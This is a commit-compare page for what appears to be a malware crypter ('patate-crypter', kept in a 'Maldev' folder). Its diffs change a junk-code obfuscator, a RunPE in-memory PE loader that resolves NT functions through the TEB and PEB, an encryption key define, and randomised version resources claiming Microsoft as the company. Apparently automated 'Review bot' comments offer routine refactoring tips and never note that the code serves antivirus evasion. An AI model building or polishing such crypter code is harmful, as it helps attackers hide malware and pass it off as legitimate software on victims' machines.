Compare commits
2 Commits
15c8e787e2
...
89883c9153
| Author | SHA1 | Date | |
|---|---|---|---|
|
89883c9153
|
|||
|
644be7fb11
|
@@ -153,7 +153,7 @@ class Ui_mainWindow(object):
|
|||||||
if self.climode :
|
if self.climode :
|
||||||
out_filename = self.filename.replace(".exe", "") + "_out.exe"
|
out_filename = self.filename.replace(".exe", "") + "_out.exe"
|
||||||
else :
|
else :
|
||||||
out_filename = "../bin/" + self.filename + "_out.exe"
|
out_filename = "../bin/" + self.filename.replace(".exe", "") + "_out.exe"
|
||||||
xor_key = ''
|
xor_key = ''
|
||||||
|
|
||||||
if self.xor :
|
if self.xor :
|
||||||
|
|||||||
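Review bot: Both branches now strip the extension with `self.filename.replace(".exe", "")`, which removes every `.exe` substring in the name rather than only a trailing one, and is case-sensitive, so a name such as `a.exe.b.exe` or `TOOL.EXE` yields an unexpected output name. Computing the stem once before the `if self.climode` test would fix that and remove the duplicated expression, e.g. `stem = self.filename[:-4] if self.filename.lower().endswith(".exe") else self.filename`. The second branch also concatenates the name straight into `"../bin/"`, so if `self.filename` can carry a directory component the resulting path should be checked. The enclosing method starts and ends outside this hunk.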
@@ -173,6 +173,7 @@ def obfuscate(PASS, CFLOW_PASS, cflow, junk, is64bit) :
|
|||||||
in_switch = False
|
in_switch = False
|
||||||
in_asm = False
|
in_asm = False
|
||||||
in_dowhile = False
|
in_dowhile = False
|
||||||
|
in_struct = False
|
||||||
can_code = False
|
can_code = False
|
||||||
wait_for_func_close = False
|
wait_for_func_close = False
|
||||||
in_debug = False
|
in_debug = False
|
||||||
@@ -202,6 +203,8 @@ def obfuscate(PASS, CFLOW_PASS, cflow, junk, is64bit) :
|
|||||||
elif in_switch and "}" in line and not "case" in line and not "default" in line : in_switch = False
|
elif in_switch and "}" in line and not "case" in line and not "default" in line : in_switch = False
|
||||||
if "__asm" in line : in_asm = True
|
if "__asm" in line : in_asm = True
|
||||||
elif in_asm and "}" in line : in_asm = False
|
elif in_asm and "}" in line : in_asm = False
|
||||||
|
if "struct" in line : in_struct = True
|
||||||
|
elif in_struct and "}" in line : in_struct = False
|
||||||
if "// Your code here" in line :
|
if "// Your code here" in line :
|
||||||
#can_code = True
|
#can_code = True
|
||||||
pass
|
pass
|
||||||
@@ -224,7 +227,7 @@ def obfuscate(PASS, CFLOW_PASS, cflow, junk, is64bit) :
|
|||||||
b = re.search(func_def_pattern, line) != None
|
b = re.search(func_def_pattern, line) != None
|
||||||
|
|
||||||
if not can_code :
|
if not can_code :
|
||||||
if b or a or in_comment or in_switch or in_asm : continue # we can't write
|
if b or a or in_comment or in_switch or in_asm or in_struct : continue # we can't write
|
||||||
|
|
||||||
if GetRandomBool() and junk and k < PASS : # do we create a variable ?
|
if GetRandomBool() and junk and k < PASS : # do we create a variable ?
|
||||||
out.append(GetRandomVar()+"\n")
|
out.append(GetRandomVar()+"\n")
|
||||||
|
|||||||
@@ -1,2 +1,2 @@
|
|||||||
#pragma once
|
#pragma once
|
||||||
#define KEY "ougoqugduzqd"
|
#define KEY ""
|
||||||
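Review bot: This header looks like a per-build generated file that is being tracked in version control. `KEY` is reset to an empty string here, and the resource script later in this compare has its `FileDescription`, `InternalName`, `OriginalFilename` and `ProductName` values replaced by new random-looking strings. Tracked generated files add noise to every diff and leave earlier values, including the previous key literal, in the repository history; consider committing a template and ignoring the generated copies. If an empty `KEY` is a valid state, say so with a comment such as `// KEY is written by the build tool; empty means no key was set`, because the meaning of the empty value is not visible in this hunk.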
@@ -1,3 +1,5 @@
|
|||||||
|
typedef struct IUnknown IUnknown;
|
||||||
|
|
||||||
#include <windows.h>
|
#include <windows.h>
|
||||||
#include <cstdio>
|
#include <cstdio>
|
||||||
#include <iostream>
|
#include <iostream>
|
||||||
@@ -91,13 +93,25 @@ typedef NTSTATUS (NTAPI *NtAllocateVirtualMemoryPtr)(HANDLE ProcessHandle, PVOID
|
|||||||
typedef NTSTATUS (NTAPI *LdrLoadDllPtr)(PWCHAR, ULONG, PUNICODE_STRING, PHANDLE);
|
typedef NTSTATUS (NTAPI *LdrLoadDllPtr)(PWCHAR, ULONG, PUNICODE_STRING, PHANDLE);
|
||||||
typedef NTSTATUS (NTAPI *RtlInitUnicodeStringPtr)(PUNICODE_STRING DestinationString, PCWSTR SourceString);
|
typedef NTSTATUS (NTAPI *RtlInitUnicodeStringPtr)(PUNICODE_STRING DestinationString, PCWSTR SourceString);
|
||||||
|
|
||||||
|
typedef struct __TEB {
|
||||||
|
PVOID Reserved1[12];
|
||||||
|
PPEB ProcessEnvironmentBlock;
|
||||||
|
PVOID Reserved2[399];
|
||||||
|
BYTE Reserved3[1952];
|
||||||
|
PVOID TlsSlots[64];
|
||||||
|
BYTE Reserved4[8];
|
||||||
|
PVOID Reserved5[26];
|
||||||
|
PVOID ReservedForOle;
|
||||||
|
PVOID Reserved6[4];
|
||||||
|
PVOID TlsExpansionSlots;
|
||||||
|
} TEB_, * PTEB_;
|
||||||
|
|
||||||
void* get_ntfunction(const char* func) {
|
void* get_ntfunction(const char* func) {
|
||||||
//START
|
//START
|
||||||
#ifdef _M_X64
|
#ifdef _M_X64
|
||||||
PTEB tebPtr = reinterpret_cast<PTEB>(__readgsqword(reinterpret_cast<DWORD_PTR>(&static_cast<NT_TIB*>(nullptr)->Self)));
|
PTEB_ tebPtr = reinterpret_cast<PTEB_>(__readgsqword(reinterpret_cast<DWORD_PTR>(&static_cast<NT_TIB*>(nullptr)->Self)));
|
||||||
#else
|
#else
|
||||||
PTEB tebPtr = reinterpret_cast<PTEB>(__readfsdword(reinterpret_cast<DWORD_PTR>(&static_cast<NT_TIB*>(nullptr)->Self)));
|
PTEB_ tebPtr = reinterpret_cast<PTEB_>(__readfsdword(reinterpret_cast<DWORD_PTR>(&static_cast<NT_TIB*>(nullptr)->Self)));
|
||||||
#endif
|
#endif
|
||||||
|
|
||||||
PPEB_LDR_DATA ldrData = tebPtr->ProcessEnvironmentBlock->Ldr;
|
PPEB_LDR_DATA ldrData = tebPtr->ProcessEnvironmentBlock->Ldr;
|
||||||
@@ -154,6 +168,7 @@ HMODULE RunPE(const void* dll_buffer, size_t dll_size, DWORD newBase)
|
|||||||
return NULL;
|
return NULL;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
DEBUG_PRINTF("[+] Allocated memory at 0x%p\n", image_base);
|
||||||
const IMAGE_SECTION_HEADER* section_headers = reinterpret_cast<const IMAGE_SECTION_HEADER*>(nt_headers + 1);
|
const IMAGE_SECTION_HEADER* section_headers = reinterpret_cast<const IMAGE_SECTION_HEADER*>(nt_headers + 1);
|
||||||
// Copy the section data to the allocated memory.
|
// Copy the section data to the allocated memory.
|
||||||
for (WORD i = 0; i < nt_headers->FileHeader.NumberOfSections; ++i) {
|
for (WORD i = 0; i < nt_headers->FileHeader.NumberOfSections; ++i) {
|
||||||
|
|||||||
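Review bot: The new `__TEB` typedef has no comment explaining why a private copy of the TEB layout is declared, and its tag begins with a double underscore, which C++ reserves for the implementation. The field list appears to match the `TEB` declaration in `<winternl.h>`, so a tag such as `TEB_LOCAL` and a comment like `// Local mirror of winternl.h's TEB; keep field order and sizes in sync with the SDK` would make that explicit. Adding `static_assert(offsetof(TEB_, ProcessEnvironmentBlock) == 12 * sizeof(PVOID), "TEB layout");` would catch drift at compile time. The added `typedef struct IUnknown IUnknown;` at the top of the file is presumably a workaround for the ClangCL toolset switch made elsewhere in this compare, and should be labelled as one. `get_ntfunction` continues past the end of its hunk.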
@@ -68,12 +68,12 @@ BEGIN
|
|||||||
BLOCK "040c04b0"
|
BLOCK "040c04b0"
|
||||||
BEGIN
|
BEGIN
|
||||||
VALUE "CompanyName", "Microsoft"
|
VALUE "CompanyName", "Microsoft"
|
||||||
VALUE "FileDescription", "cixctkirmfubayfzkbog"
|
VALUE "FileDescription", "dnsfzllrjwhkcwdfijbb"
|
||||||
VALUE "FileVersion", "1.0.0.1"
|
VALUE "FileVersion", "1.0.0.1"
|
||||||
VALUE "InternalName", "bcjphkt.exe"
|
VALUE "InternalName", "fbjriet.exe"
|
||||||
VALUE "LegalCopyright", "Copyright (C) 2023"
|
VALUE "LegalCopyright", "Copyright (C) 2023"
|
||||||
VALUE "OriginalFilename", "nybxftw.exe"
|
VALUE "OriginalFilename", "pvgcwpf.exe"
|
||||||
VALUE "ProductName", "txwfqte.exe"
|
VALUE "ProductName", "wisjfvx.exe"
|
||||||
VALUE "ProductVersion", "1.0.0.1"
|
VALUE "ProductVersion", "1.0.0.1"
|
||||||
END
|
END
|
||||||
END
|
END
|
||||||
@@ -83,7 +83,7 @@ BEGIN
|
|||||||
END
|
END
|
||||||
END
|
END
|
||||||
|
|
||||||
MAINICON ICON "C:/Users/patate/Desktop/Programmation/C++/Maldev/patate-crypter/icon.ico"
|
//MAINICON ICON ""
|
||||||
#endif
|
#endif
|
||||||
/////////////////////////////////////////////////////////////////////////////
|
/////////////////////////////////////////////////////////////////////////////
|
||||||
|
|
||||||
|
|||||||
@@ -29,26 +29,26 @@
|
|||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
|
||||||
<ConfigurationType>Application</ConfigurationType>
|
<ConfigurationType>Application</ConfigurationType>
|
||||||
<UseDebugLibraries>true</UseDebugLibraries>
|
<UseDebugLibraries>true</UseDebugLibraries>
|
||||||
<PlatformToolset>v143</PlatformToolset>
|
<PlatformToolset>ClangCL</PlatformToolset>
|
||||||
<CharacterSet>MultiByte</CharacterSet>
|
<CharacterSet>MultiByte</CharacterSet>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
||||||
<ConfigurationType>Application</ConfigurationType>
|
<ConfigurationType>Application</ConfigurationType>
|
||||||
<UseDebugLibraries>false</UseDebugLibraries>
|
<UseDebugLibraries>false</UseDebugLibraries>
|
||||||
<PlatformToolset>v143</PlatformToolset>
|
<PlatformToolset>ClangCL</PlatformToolset>
|
||||||
<WholeProgramOptimization>false</WholeProgramOptimization>
|
<WholeProgramOptimization>false</WholeProgramOptimization>
|
||||||
<CharacterSet>MultiByte</CharacterSet>
|
<CharacterSet>MultiByte</CharacterSet>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
||||||
<ConfigurationType>Application</ConfigurationType>
|
<ConfigurationType>Application</ConfigurationType>
|
||||||
<UseDebugLibraries>true</UseDebugLibraries>
|
<UseDebugLibraries>true</UseDebugLibraries>
|
||||||
<PlatformToolset>v143</PlatformToolset>
|
<PlatformToolset>ClangCL</PlatformToolset>
|
||||||
<CharacterSet>MultiByte</CharacterSet>
|
<CharacterSet>MultiByte</CharacterSet>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
||||||
<ConfigurationType>Application</ConfigurationType>
|
<ConfigurationType>Application</ConfigurationType>
|
||||||
<UseDebugLibraries>false</UseDebugLibraries>
|
<UseDebugLibraries>false</UseDebugLibraries>
|
||||||
<PlatformToolset>v143</PlatformToolset>
|
<PlatformToolset>ClangCL</PlatformToolset>
|
||||||
<WholeProgramOptimization>false</WholeProgramOptimization>
|
<WholeProgramOptimization>false</WholeProgramOptimization>
|
||||||
<CharacterSet>MultiByte</CharacterSet>
|
<CharacterSet>MultiByte</CharacterSet>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
|
|||||||
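Review bot: All four configurations switch `PlatformToolset` from `v143` to `ClangCL`, but nothing in this compare records that the optional Clang toolset component must be installed in Visual Studio. A checkout on a default installation will therefore fail to build the project, so a line in the build instructions should cover it. The value is also repeated in four `PropertyGroup` blocks; setting it once in a shared, unconditioned group would keep the configurations from drifting apart.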